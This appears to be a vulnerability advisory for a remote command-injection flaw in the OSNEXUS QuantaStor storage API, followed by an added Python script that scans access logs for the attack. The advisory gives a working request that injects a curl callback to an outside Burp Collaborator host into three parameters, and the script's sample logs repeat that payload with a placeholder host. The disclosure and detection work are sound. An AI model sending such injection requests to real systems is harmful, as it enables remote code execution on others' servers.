Advisory

Upgrade to the latest version of OSNEXUS QuantaStor.

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9. It allows remote execution of arbitrary shell commands via the API. The request below demonstrates this against the qstorapi storageSystemModify call, where the newDescription, newDnsServerList and newNTPServerList parameters each carry an injected shell command (the ${IFS} expansion supplies the space between the command and its argument):

http://192.168.1.154/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;curl${IFS}4nse5goajfvot3dc69552liax13urj.burpcollaborator.net&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;curl${IFS}4nse5goajfvot3dc69552liax13urj.burpcollaborator.net&externalHostName=&newNTPServerList=;curl${IFS}4nse5goajfvot3dc69552liax13urj.burpcollaborator.net
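A defender-side check derived from the request above, as an added example that is not part of the advisory or of QuantaStor itself: it scans constructed web-server access-log lines for qstorapi requests whose query parameters carry shell metacharacters, decoding percent-encoding first so encoded and raw payloads are caught alike. The log format, the sample lines and the oob.example callback host are assumptions.

```python
"""Flag shell-injection attempts against QuantaStor qstorapi endpoints in
access logs. Added example, not part of the advisory; log lines are constructed."""
import re
from urllib.parse import urlsplit, unquote_plus

# Metacharacters and expansions that have no place in a name, description or
# DNS/NTP server list: ; | & backticks, $(...) and ${VAR} (e.g. ${IFS}).
SHELL_META = re.compile(r"[;|&`]|\$\(|\$\{[A-Za-z_]+\}|\n")

# Constructed Common-Log-Format lines; lines 2 and 3 mirror the advisory's
# request shape with a placeholder callback host (one raw, one percent-encoded).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=primary%20array HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;curl${IFS}oob.example&newDnsServerList=;curl${IFS}oob.example HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /qstorapi/storageSystemModify?newNTPServerList=%3Bcurl%24%7BIFS%7Doob.example HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /static/app.js HTTP/1.1" 200 9000
"""

REQ_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')


def suspicious_params(target):
    """Return {param: decoded value} for qstorapi query parameters that contain
    shell metacharacters; {} for other paths or clean requests."""
    parts = urlsplit(target)
    if not parts.path.startswith("/qstorapi/"):
        return {}
    hits = {}
    # Split on '&' by hand: older parse_qsl versions also split on ';',
    # which would hide exactly the separator this injection relies on.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote_plus(value)
        if SHELL_META.search(value):
            hits[unquote_plus(name)] = value
    return hits


def scan_log(text):
    """Return [(source_ip, endpoint_path, {param: value})] for flagged requests."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append((m.group("src"), urlsplit(m.group("target")).path, hits))
    return findings


if __name__ == "__main__":
    for src, path, hits in scan_log(SAMPLE_LOG):
        print(f"{src} {path} -> {hits}")
```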